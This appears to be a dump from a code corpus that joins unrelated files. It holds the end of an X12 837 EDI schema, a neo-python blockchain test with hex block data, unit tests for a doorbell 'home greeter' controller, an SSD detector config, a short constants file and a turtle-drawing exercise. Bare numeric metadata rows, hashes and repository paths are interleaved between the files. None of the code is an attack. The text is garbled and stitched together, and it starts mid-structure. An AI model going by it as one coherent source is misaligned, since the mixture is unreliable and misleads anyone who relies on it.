codes=[], ), ), ), parsed_837_GS_LOOP, Segment( "TA1", Properties( desc="Interchange Acknowledgement", position="0200", repeat="1", req_sit="S", syntax="", ), Element( "TA101", Properties( desc="I12", req_sit="R", data_type=("N0", "9", "9"), position=1, codes=[], ), ), Element( "TA102", Properties( desc="I08", req_sit="R", data_type=("DT", "6", "6"), position=2, codes=[], ), ), Element( "TA103", Properties( desc="I09", req_sit="R", data_type=("TM", "4", "4"), position=3, codes=[], ), ), Element( "TA104", Properties( desc="I17", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "E", "R"], ), ), Element( "TA105", Properties( desc="I18", req_sit="R", data_type=("ID", "3", "3"), position=5, codes=[ "000", "001", "002", "003", "004", "005", "006", "007", "008", "009", "010", "011", "012", "013", "014", "015", "016", "017", "018", "019", "020", "021", "022", "023", "024", "025", "026", "027", "028", "029", "030", "031", ], ), ), ), Segment( "IEA", Properties( desc="Interchange Control Trailer", position="0300", repeat="1", req_sit="R", syntax="", ), Element( "IEA01", Properties( desc="I16", req_sit="R", data_type=("N0", "1", "5"), position=1, codes=[], ), ), Element( "IEA02", Properties( desc="I12", req_sit="R", data_type=("N0", "9", "9"), position=2, codes=[], ), ), ), ) parsed_837 = Message( "837", Properties(desc="HIPAA Health Care Claim: Professional X222A1-837"), parsed_837_ISA_LOOP, )
26.657891
121
0.310715
65,250
950,807
4.424291
0.020506
0.172693
0.034893
0.049992
0.988766
0.986414
0.985039
0.984183
0.983456
0.981572
0
0.06527
0.55568
950,807
35,666
122
26.658638
0.618068
0.000076
0
0.990382
1
0
0.128106
0.000097
0
0
0
0
0
1
0
false
0
0.000028
0
0.000028
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
9ecea7c14561252cb32b0730f867255188015cf1
3,692
py
Python
neo/SmartContract/tests/test_smart_contract.py
WhisperQFun/neo-python
1790581bfb9c91e92814fe6624997f90c08f989f
[ "MIT" ]
null
null
null
neo/SmartContract/tests/test_smart_contract.py
WhisperQFun/neo-python
1790581bfb9c91e92814fe6624997f90c08f989f
[ "MIT" ]
null
null
null
neo/SmartContract/tests/test_smart_contract.py
WhisperQFun/neo-python
1790581bfb9c91e92814fe6624997f90c08f989f
[ "MIT" ]
null
null
null
from neo.Utils.BlockchainFixtureTestCase import BlockchainFixtureTestCase from neo.IO.Helper import Helper from neo.Core.TX.Transaction import TransactionType from neo.Settings import settings import os import binascii class SmartContractTest(BlockchainFixtureTestCase): @classmethod def leveldb_testpath(self): return os.path.join(settings.DATA_DIR_PATH, 'fixtures/test_chain') # test need to be updated whenever we change the fixtures def test_a_initial_setup(self): self.assertEqual(self._blockchain.Height, 12349) invb = b'000000007134e5ee56f841bb73dbff969a9ef793c05f175cd386b2f24874a54c441cc0500e6c4e19da72fd4956a28670f36d26e03fd43c1794a1d3a5ad4f738dd48b53f505c7605b992400006b76abd322b7bd0bbe48d3a3f5d10013ab9ffee489706078714f1ea201c3400df8020bf9c22cd865b43b73060be3302abbab95b5f38941ba288cd77b846c9c1edcef1ab9a108f0a2fb8180e88178d3e85e316243054e48b29ced9dde54766340d9efc4f6d78970aba6712688071b862413bd53d58620e87c951aa3eac5c2611cdfecfcf084c12cfbe6cd356ef7726b9b5e93c10b5ffa7dc6e77ae8dc8c7af09240756caac1dad30a93662f36194fe270bb2afe0a557492122027df5f95dc5b1b9d18b169a6a96795019067ba008e5d42250c23886f0807ec20f3c880b2e740d1048b532102103a7f7dd016558597f7960d27c516a4394fd968b9e65155eb4b013e4040406e2102a7bc55fe8684e0119768d104ba30795bdcc86619e864add26156723ed185cd622102b3622bf4017bdfe317c58aed5f4c753f206b7db896046fa7d774bbc4bf7f8dc22103d90c07df63e690ce77912e10ab51acc944b66860237b608c4f8f8309e71ee69954ae0200006b76abd300000000d101de39202f726f6f742f2e6e656f707974686f6e2f436861696e732f556e6974546573742d534d2f636f6e7472616374732f73616d706c65322e70790474657374047465737404746573740474657374000102030702024c725ec56b6a00527ac46a51527ac46a52527ac46a00c3036164649c640d006a51c36a52c3936c7566616a00c3037375629c640d006a51c36a52c3946c7566616a00c3036d756c9c640d006a51c36a52c3956c7566616a00c3036469769c640d006a51c36a52c3966c7566614f6c7566006c756668134e656f2e436f6e74726163742e437265617465001a7118020000000001347fff9221a8caf429279a82906688eb78264c1a9a2791d95ee47b6e095120aa000001e72d286979ee6cb1b7e65dfddfb2e
384100b8d148e7758de42e4168b71792c600080b5fc5c02000023ba2703c53263e8d6e522dc32203339dcd8eee90141405787dc8c47ba7da02668582b822bb50e1b615546a5f01826967cba603a0744a01aed6c098d809f20ec199a84269aa01ea911564effe7c1b4ad65d71f4ca995a12321031a6c6fbbdf02ca351745fa86b9ba5a9452d785ac4f7fc2b7548ca2a46c4fcf4aac' invbh = b'ac2d9d876bb6ee5cf1d011820409180cda7594b88c94f94a110ce2f5e472294e' invtxh = '39202f726f6f742f2e6e656f707974686f6e2f436861696e732f556e6974546573742d534d2f636f6e7472616374732f73616d706c65322e70790474657374047465737404746573740474657374000102030702024c725ec56b6a00527ac46a51527ac46a52527ac46a00c3036164649c640d006a51c36a52c3936c7566616a00c3037375629c640d006a51c36a52c3946c7566616a00c3036d756c9c640d006a51c36a52c3956c7566616a00c3036469769c640d006a51c36a52c3966c7566614f6c7566006c756668134e656f2e436f6e74726163742e437265617465' def test_a_invocation_block(self): hexdata = binascii.unhexlify(self.invb) block = Helper.AsSerializableWithType(hexdata, 'neo.Core.Block.Block') self.assertEqual(block.Hash.ToBytes(), self.invbh) self.assertEqual(block.Index, 9369) invtx = None for tx in block.Transactions: if tx.Type == TransactionType.InvocationTransaction: invtx = tx self.assertIsNotNone(invtx) self.assertEqual(len(invtx.Script), 222) self.assertEqual(invtx.Script.hex(), self.invtxh) def test_a_run_sc(self): hexdata = binascii.unhexlify(self.invb) block = Helper.AsSerializableWithType(hexdata, 'neo.Core.Block.Block') result = self._blockchain.Persist(block) self.assertTrue(result)
72.392157
1,784
0.884345
165
3,692
19.69697
0.472727
0.023077
0.007385
0.017231
0.057231
0.057231
0.057231
0.057231
0.057231
0.057231
0
0.485563
0.080715
3,692
50
1,785
73.84
0.472009
0.014897
0
0.125
0
0
0.642916
0.626685
0
1
0
0
0.21875
1
0.125
false
0
0.1875
0.03125
0.46875
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
1
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
7
9ed97fbe72e51be409cab21e009c6b1db7ca6569
115
py
Python
src/researchhub_document/related_models/constants/editor_type.py
ResearchHub/ResearchHub-Backend-Open
d36dca33afae2d442690694bb2ab17180d84bcd3
[ "MIT" ]
18
2021-05-20T13:20:16.000Z
2022-02-11T02:40:18.000Z
src/researchhub_document/related_models/constants/editor_type.py
ResearchHub/ResearchHub-Backend-Open
d36dca33afae2d442690694bb2ab17180d84bcd3
[ "MIT" ]
109
2021-05-21T20:14:23.000Z
2022-03-31T20:56:10.000Z
src/researchhub_document/related_models/constants/editor_type.py
ResearchHub/ResearchHub-Backend-Open
d36dca33afae2d442690694bb2ab17180d84bcd3
[ "MIT" ]
4
2021-05-17T13:47:53.000Z
2022-02-12T10:48:21.000Z
CK_EDITOR = 'CK_EDITOR' DRAFT_JS = 'DRAFT_JS' EDITOR_TYPES = ( (CK_EDITOR, CK_EDITOR), (DRAFT_JS, DRAFT_JS) )
14.375
25
0.695652
18
115
3.944444
0.277778
0.450704
0.28169
0.450704
0.84507
0.84507
0.84507
0.84507
0
0
0
0
0.165217
115
7
26
16.428571
0.739583
0
0
0
0
0
0.147826
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
1
1
1
1
1
1
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
73053753b9679f65365611fc6443983fc798a7e2
159
py
Python
photo/admin.py
prajalpatidar06/Hazel
76ce084ab81962d579f1e14e3258f332b3bb4965
[ "Apache-2.0" ]
null
null
null
photo/admin.py
prajalpatidar06/Hazel
76ce084ab81962d579f1e14e3258f332b3bb4965
[ "Apache-2.0" ]
null
null
null
photo/admin.py
prajalpatidar06/Hazel
76ce084ab81962d579f1e14e3258f332b3bb4965
[ "Apache-2.0" ]
null
null
null
from django.contrib import admin # Register your models here. from .models import Photo,Category admin.site.register(Category) admin.site.register(Photo)
26.5
35
0.792453
22
159
5.727273
0.545455
0.206349
0.269841
0.396825
0
0
0
0
0
0
0
0
0.125786
159
6
36
26.5
0.906475
0.163522
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
7
732a7f1b37ad96fab6aa4da3fc66718cb6bb5617
11,617
py
Python
tests/test_controller.py
samfrench/home-greeter
d03451912162c59e790989fd773fa1fbe66431e2
[ "MIT" ]
null
null
null
tests/test_controller.py
samfrench/home-greeter
d03451912162c59e790989fd773fa1fbe66431e2
[ "MIT" ]
null
null
null
tests/test_controller.py
samfrench/home-greeter
d03451912162c59e790989fd773fa1fbe66431e2
[ "MIT" ]
null
null
null
from unittest import TestCase from mock import Mock, call, patch # Mocking picamera module before camera import import sys sys.modules['picamera'] = Mock() from home_greeter.controller import Controller class TestControllerWithVisitorAndOccupierIn(TestCase): def setUp(self): self.mock_detector = Mock(autospec='home_greeter.detector.Detector') self.mock_greeter = Mock(autospec='home_greeter.greeter.Greeter') self.mock_camera = Mock(autospec='home_greeter.Camera') self.mock_imager = Mock(autospec='home_greeter.imager.Imager') self.mock_tweeter = Mock(autospec='home_greeter.Tweeter') self.controller = Controller( detector = self.mock_detector, greeter = self.mock_greeter, camera = self.mock_camera, imager = self.mock_imager, tweeter = self.mock_tweeter ) self.mock_imager.is_delivery.return_value = False # Mock out the visitor self.channel = 1 # This can be anything, but a channel number is provided when an event is detected self.controller.should_run(False) def test_create(self): self.assertIsInstance(self.controller, Controller) def test_run_calls_detector_subscribe(self): self.controller.run() self.mock_detector.subscribe.assert_called_once_with(self.controller._Controller__process) def test_greeter_welcome_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.welcome.assert_called_once() def test_camera_take_photo_for_detection_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.INITIAL_PHOTO)]) def test_greeter_ask_for_visitor_name_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_for_visitor_name.assert_called_once() def test_greeter_ask_for_occupier_name_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_for_occupier_name.assert_called_once() def test_greeter_update_visitor_about_asking_for_occupier_is_called(self): with patch.object(self.mock_greeter, 'ask_for_visitor_name', 
return_value='Bob'): with patch.object(self.mock_greeter, 'ask_for_occupier_name', return_value='Alice'): self.controller._Controller__process(self.channel) self.mock_greeter.update_visitor_about_asking_for_occupier.assert_called_once_with('Bob', 'Alice') def test_greeter_request_occupier_come_to_the_door_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.request_occupier_come_to_the_door.assert_called_once() # Multiple items are returned when waiting for input # As long as the first is True this will stop the application flow @patch('select.select', return_value=[True, None, None]) def test_occupier_at_door_so_no_other_methods_called(self, keypress): self.controller._Controller__process(self.channel) self.mock_greeter.take_message_for_occupier.assert_not_called() self.mock_greeter.take_photo.assert_not_called() self.mock_camera.take_photo.assert_called_once_with(Controller.INITIAL_PHOTO) self.mock_tweeter.tweet_message_with_image.assert_not_called() self.mock_greeter.thank_visitor.assert_not_called() class TestControllerWithVisitorAndOccupierOut(TestCase): def setUp(self): self.mock_detector = Mock(autospec='home_greeter.Detector') self.mock_greeter = Mock(autospec='home_greeter.Greeter') self.mock_camera = Mock(autospec='home_greeter.Camera') self.mock_imager = Mock(autospec='home_greeter.imager.Imager') self.mock_tweeter = Mock(autospec='home_greeter.Tweeter') self.controller = Controller( detector = self.mock_detector, greeter = self.mock_greeter, camera = self.mock_camera, imager = self.mock_imager, tweeter = self.mock_tweeter ) self.mock_imager.is_delivery.return_value = False # Mock out the visitor self.channel = 1 # This can be anything, but a channel number is provided when an event is detected self.controller.should_run(False) def test_create(self): self.assertIsInstance(self.controller, Controller) def test_run_calls_detector_subscribe(self): self.controller.run() 
self.mock_detector.subscribe.assert_called_once_with(self.controller._Controller__process) def test_greeter_welcome_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.welcome.assert_called_once() def test_camera_take_photo_for_detection_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.INITIAL_PHOTO)]) def test_greeter_ask_for_visitor_name_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_for_visitor_name.assert_called_once() def test_greeter_ask_for_occupier_name_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_for_occupier_name.assert_called_once() def test_greeter_update_visitor_about_asking_for_occupier_is_called(self): with patch.object(self.mock_greeter, 'ask_for_visitor_name', return_value='Bob'): with patch.object(self.mock_greeter, 'ask_for_occupier_name', return_value='Alice'): self.controller._Controller__process(self.channel) self.mock_greeter.update_visitor_about_asking_for_occupier.assert_called_once_with('Bob', 'Alice') def test_greeter_request_occupier_come_to_the_door_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.request_occupier_come_to_the_door.assert_called_once() def test_greeter_take_message_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.take_message_for_occupier.assert_called_once() def test_greeter_take_photo_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.take_photo.assert_called_once() def test_camera_take_photo_of_visitor_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.VISITOR_PHOTO)]) def test_tweeter_tweet_message_with_image_is_called(self): with patch.object(self.mock_greeter, 'take_message_for_occupier', return_value='I am outside'): 
self.controller._Controller__process(self.channel) self.mock_tweeter.tweet_message_with_image.assert_called_once_with('I am outside', Controller.VISITOR_PHOTO) def test_greeter_thank_visitor_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.thank_visitor.assert_called_once() class TestControllerWithDeliveryAndSomeoneIn(TestCase): def setUp(self): self.mock_detector = Mock(autospec='home_greeter.detector.Detector') self.mock_greeter = Mock(autospec='home_greeter.greeter.Greeter') self.mock_camera = Mock(autospec='home_greeter.Camera') self.mock_imager = Mock(autospec='home_greeter.imager.Imager') self.mock_tweeter = Mock(autospec='home_greeter.Tweeter') self.controller = Controller( detector = self.mock_detector, greeter = self.mock_greeter, camera = self.mock_camera, imager = self.mock_imager, tweeter = self.mock_tweeter ) self.mock_imager.is_delivery.return_value = True # Mock out the delivery self.channel = 1 # This can be anything, but a channel number is provided when an event is detected self.controller.should_run(False) def test_create(self): self.assertIsInstance(self.controller, Controller) def test_run_calls_detector_subscribe(self): self.controller.run() self.mock_detector.subscribe.assert_called_once_with(self.controller._Controller__process) def test_greeter_welcome_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.welcome.assert_called_once() def test_camera_take_photo_for_detection_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.INITIAL_PHOTO)]) def test_greeter_says_to_wait_for_someone(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_deliverer_to_wait.assert_called_once() def test_greeter_request_someone_come_to_the_door_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.request_someone_come_to_the_door.assert_called_once() # Multiple 
items are returned when waiting for input # As long as the first is True this will stop the application flow @patch('select.select', return_value=[True, None, None]) def test_occupier_at_door_so_no_other_methods_called(self, keypress): self.controller._Controller__process(self.channel) self.mock_greeter.ask_deliverer_to_leave_parcel.assert_not_called() class TestControllerWithDeliveryAndNobodyIn(TestCase): def setUp(self): self.mock_detector = Mock(autospec='home_greeter.detector.Detector') self.mock_greeter = Mock(autospec='home_greeter.greeter.Greeter') self.mock_camera = Mock(autospec='home_greeter.Camera') self.mock_imager = Mock(autospec='home_greeter.imager.Imager') self.mock_tweeter = Mock(autospec='home_greeter.Tweeter') self.controller = Controller( detector = self.mock_detector, greeter = self.mock_greeter, camera = self.mock_camera, imager = self.mock_imager, tweeter = self.mock_tweeter ) self.mock_imager.is_delivery.return_value = True # Mock out the delivery self.channel = 1 # This can be anything, but a channel number is provided when an event is detected self.controller.should_run(False) def test_create(self): self.assertIsInstance(self.controller, Controller) def test_run_calls_detector_subscribe(self): self.controller.run() self.mock_detector.subscribe.assert_called_once_with(self.controller._Controller__process) def test_greeter_welcome_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.welcome.assert_called_once() def test_camera_take_photo_for_detection_is_called(self): self.controller._Controller__process(self.channel) self.mock_camera.take_photo.assert_has_calls([call(Controller.INITIAL_PHOTO)]) def test_greeter_says_to_wait_for_someone(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_deliverer_to_wait.assert_called_once() def test_greeter_request_someone_come_to_the_door_is_called(self): self.controller._Controller__process(self.channel) 
self.mock_greeter.request_someone_come_to_the_door.assert_called_once() def test_ask_deliverer_to_leave_parcel_is_called(self): self.controller._Controller__process(self.channel) self.mock_greeter.ask_deliverer_to_leave_parcel.assert_called_once()
49.224576
120
0.747353
1,486
11,617
5.431359
0.080754
0.084252
0.118944
0.122909
0.941643
0.926775
0.910296
0.902738
0.882419
0.871639
0
0.000416
0.17242
11,617
235
121
49.434043
0.839089
0.059051
0
0.819149
0
0
0.061555
0.033526
0
0
0
0
0.212766
1
0.212766
false
0
0.021277
0
0.255319
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
8
733a9861e29f6ac3de81b6825a251ecd4d36299d
128
py
Python
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_0/_pkg1_1_0_1/_pkg1_1_0_1_1/_mod1_1_0_1_1_3.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_0/_pkg1_1_0_1/_pkg1_1_0_1_1/_mod1_1_0_1_1_3.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_0/_pkg1_1_0_1/_pkg1_1_0_1_1/_mod1_1_0_1_1_3.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
name1_1_0_1_1_3_0 = None name1_1_0_1_1_3_1 = None name1_1_0_1_1_3_2 = None name1_1_0_1_1_3_3 = None name1_1_0_1_1_3_4 = None
14.222222
24
0.820313
40
128
1.875
0.175
0.4
0.466667
0.533333
0.88
0.88
0.746667
0
0
0
0
0.318182
0.140625
128
9
25
14.222222
0.363636
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
1
null
1
1
1
1
1
1
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
b42c67e02472148039f4fa6e851e1eac6b1245df
170
py
Python
commands/__init__.py
applanga/applanga-cli
6ca7218f30ff8ea62f660eeebf6e0db3ac908267
[ "MIT" ]
2
2018-06-27T12:28:19.000Z
2021-10-05T04:31:38.000Z
commands/__init__.py
applanga/applanga-cli
6ca7218f30ff8ea62f660eeebf6e0db3ac908267
[ "MIT" ]
null
null
null
commands/__init__.py
applanga/applanga-cli
6ca7218f30ff8ea62f660eeebf6e0db3ac908267
[ "MIT" ]
2
2020-01-24T16:49:34.000Z
2021-06-10T11:08:40.000Z
from commands import config from commands import init from commands import pull from commands import push from commands import pullSource from commands import pushTarget
24.285714
31
0.858824
24
170
6.083333
0.375
0.493151
0.739726
0
0
0
0
0
0
0
0
0
0.141176
170
6
32
28.333333
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
b45a5be5999353c0c2fe3648d6823d398f42f0a0
165
py
Python
tests_example/test_module_three.py
elpassion/danger-py-cov
343b63154edf3980b2071a121206a1f31f20b7b0
[ "MIT" ]
1
2020-02-17T10:19:42.000Z
2020-02-17T10:19:42.000Z
tests_example/test_module_three.py
elpassion/danger-py-cov
343b63154edf3980b2071a121206a1f31f20b7b0
[ "MIT" ]
5
2020-02-04T15:27:47.000Z
2020-02-14T10:42:08.000Z
tests_example/test_module_three.py
elpassion/danger-py-cov
343b63154edf3980b2071a121206a1f31f20b7b0
[ "MIT" ]
1
2020-02-14T13:16:48.000Z
2020-02-14T13:16:48.000Z
from danger_py_cov_example.module_three import squarer def test_squarer_works_for_zero(): """ Test squarer works for 0. """ assert squarer(0) == 0
18.333333
54
0.69697
24
165
4.458333
0.666667
0.205607
0.299065
0.35514
0
0
0
0
0
0
0
0.023077
0.212121
165
8
55
20.625
0.8
0.151515
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
9
b467a733ae24ea1e8e9cfd14457ce4643da4d5c3
5,483
py
Python
data/config.py
outsidercsy/PeleeNet_Detection_pytorch
675b5c0bd75ff880e47d605df0dc944db0756873
[ "MIT" ]
3
2019-10-30T00:43:46.000Z
2020-01-10T13:32:45.000Z
data/config.py
outsidercsy/PeleeNet_Detection_pytorch
675b5c0bd75ff880e47d605df0dc944db0756873
[ "MIT" ]
null
null
null
data/config.py
outsidercsy/PeleeNet_Detection_pytorch
675b5c0bd75ff880e47d605df0dc944db0756873
[ "MIT" ]
2
2019-11-19T01:56:15.000Z
2020-05-24T01:44:44.000Z
# config.py
#
# Dataset/model configuration dictionaries for an SSD-style detector with a
# 304x304 input ("SSD304"). Each dict describes one training dataset: class
# count, LR schedule, feature-map sizes, and prior-box (anchor) geometry.

import os.path

# Home directory used elsewhere for dataset paths.
# NOTE(review): hard-coded to a workspace path; the original value was "~".
HOME = os.path.expanduser("/workspace2/csy")

# RGBA colors cycled through when drawing bounding boxes.
COLORS = (
    (255, 0, 0, 128),
    (0, 255, 0, 128),
    (0, 0, 255, 128),
    (0, 255, 255, 128),
    (255, 0, 255, 128),
    (255, 255, 0, 128),
)

# Per-channel image mean, BGR order.
MEANS = (104, 117, 123)

# SSD300 CONFIGS

# PASCAL VOC (20 classes + background).
voc = {
    'num_classes': 21,
    'lr_steps': (80000, 100000, 150000, 200000),
    'max_iter': 200000,
    'feature_maps': [19, 19, 10, 5, 3, 1],
    'min_dim': 304,
    'steps': [16, 16, 30, 61, 101, 304],
    'min_sizes': [30, 60, 111, 162, 213, 264],
    'max_sizes': [60, 111, 162, 213, 264, 315],
    'aspect_ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]],
    'variance': [0.1, 0.2],
    'clip': True,
    'name': 'VOC',
    'anchor_nums': [4, 6, 6, 6, 4, 4],
    'flip': True,
}

# HOLO dataset (14 classes + background).
holo = {
    'num_classes': 15,
    'lr_steps': (30000, 100000, 120000),
    'max_iter': 120000,
    'feature_maps': [19, 19, 10, 5, 3, 1],
    'min_dim': 304,
    'steps': [16, 16, 30, 61, 101, 304],
    'min_sizes': [30, 60, 111, 162, 213, 264],
    'max_sizes': [60, 111, 162, 213, 264, 315],
    'aspect_ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]],
    'variance': [0.1, 0.2],
    'clip': True,
    'name': 'HOLO',
    'anchor_nums': [4, 6, 6, 6, 4, 4],
    'flip': True,
}

# HOLO v2 dataset (6 classes + background).
holov2 = {
    'num_classes': 7,
    'lr_steps': (100000, 150000, 200000),
    'max_iter': 200000,
    'feature_maps': [19, 19, 10, 5, 3, 1],
    'min_dim': 304,
    'steps': [16, 16, 30, 61, 101, 304],
    'min_sizes': [30, 60, 111, 162, 213, 264],
    'max_sizes': [60, 111, 162, 213, 264, 315],
    'aspect_ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]],
    'variance': [0.1, 0.2],
    'clip': True,
    'name': 'HOLOV2',
    'anchor_nums': [4, 6, 6, 6, 4, 4],
    'flip': True,
}

# MS COCO (200 classes + background in this setup).
coco = {
    'num_classes': 201,
    'lr_steps': (280000, 360000, 400000),
    'max_iter': 400000,
    'feature_maps': [19, 19, 10, 5, 3, 1],
    'min_dim': 304,
    'steps': [16, 16, 30, 61, 101, 304],
    'min_sizes': [21, 45, 99, 153, 207, 261],
    'max_sizes': [45, 99, 153, 207, 261, 315],
    'aspect_ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]],
    'variance': [0.1, 0.2],
    'clip': True,
    'name': 'COCO',
    'anchor_nums': [4, 6, 6, 6, 4, 4],
    'flip': True,
}

# ICDAR 2015 scene-text detection (text vs. background).
# Earlier experiments (kept for reference):
#   aspect_ratios [2,3,5,7,10] with the standard min/max sizes -> ~0.34 avg IoU;
#   the active anchor set below reached ~0.44 avg IoU.
icdar2015 = {
    'num_classes': 2,
    'lr_steps': (30000, 70000, 150000),
    'max_iter': 150000,
    'feature_maps': [19, 19, 10, 5, 3, 1],
    'min_dim': 304,
    'steps': [16, 16, 30, 61, 101, 304],
    'min_sizes': [15, 30, 90, 162, 213, 264],
    'max_sizes': [30, 90, 162, 213, 264, 315],
    'aspect_ratios': [[2, 3, 5], [2, 3, 5], [2, 3, 5],
                      [2, 3, 5], [2, 3, 5], [2, 3, 5]],
    'variance': [0.1, 0.2],
    'clip': True,
    'name': 'ICDAR2015',
    'anchor_nums': [8, 8, 8, 8, 8, 8],
    'flip': True,
}

# ICDAR 2013 scene-text detection (text vs. background).
# An alternative anchor set ([2,3,5] ratios with smaller min_sizes and
# anchor_nums of 11 with flip=True) was tried and left disabled.
icdar2013 = {
    'num_classes': 2,
    'lr_steps': (0, 15000),
    'max_iter': 20010,
    'feature_maps': [19, 19, 10, 5, 3, 1],
    'min_dim': 304,
    'steps': [16, 16, 30, 61, 101, 304],
    'min_sizes': [30, 60, 111, 162, 213, 264],
    'max_sizes': [60, 111, 162, 213, 264, 315],
    'aspect_ratios': [[2, 3, 5, 7, 10], [2, 3, 5, 7, 10], [2, 3, 5, 7, 10],
                      [2, 3, 5, 7, 10], [2, 3, 5, 7, 10], [2, 3, 5, 7, 10]],
    'variance': [0.1, 0.2],
    'clip': True,
    'name': 'ICDAR2013',
    'anchor_nums': [7, 7, 7, 7, 7, 7],
    'flip': False,
}

# SynthText pre-training. The active settings below are the ICDAR2015-style
# anchors; an ICDAR2013-style variant ([2,3,5,7,10] ratios, anchor_nums of 7,
# flip=False) was tried earlier and left disabled.
synthtext = {
    'num_classes': 2,
    'lr_steps': (30000, 60000),
    'max_iter': 50010,
    'feature_maps': [19, 19, 10, 5, 3, 1],
    'min_dim': 304,
    'steps': [16, 16, 30, 61, 101, 304],
    'min_sizes': [15, 30, 90, 162, 213, 264],
    'max_sizes': [30, 90, 162, 213, 264, 315],
    'aspect_ratios': [[2, 3, 5], [2, 3, 5], [2, 3, 5],
                      [2, 3, 5], [2, 3, 5], [2, 3, 5]],
    'variance': [0.1, 0.2],
    'clip': True,
    'name': 'SynthText',
    'anchor_nums': [8, 8, 8, 8, 8, 8],
    'flip': True,
}
30.977401
115
0.472552
907
5,483
2.76075
0.125689
0.047923
0.057508
0.039936
0.784744
0.769569
0.755192
0.738818
0.738818
0.738818
0
0.290401
0.249498
5,483
177
116
30.977401
0.318105
0.256064
0
0.598291
0
0
0.215681
0
0
0
0
0
0
1
0
false
0
0.008547
0
0.008547
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
81f18846838ba09698e64433a734c02341635c86
1,185
py
Python
stage05-artist1/s1level31.py
xenomorff/code-dot-org-python
7b35999dc35fa9ca13c683f43eca631dc92e5da4
[ "Unlicense" ]
null
null
null
stage05-artist1/s1level31.py
xenomorff/code-dot-org-python
7b35999dc35fa9ca13c683f43eca631dc92e5da4
[ "Unlicense" ]
null
null
null
stage05-artist1/s1level31.py
xenomorff/code-dot-org-python
7b35999dc35fa9ca13c683f43eca631dc92e5da4
[ "Unlicense" ]
null
null
null
"""Stage 5: Puzzle 8 of 10 Ok, try to figure out what happens when you run this code. Then, repeat it enough times to complete the drawing. The colors will be different every time. """ import sys sys.path.append('..') import codestudio artist = codestudio.load('s1level31') a = artist artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) 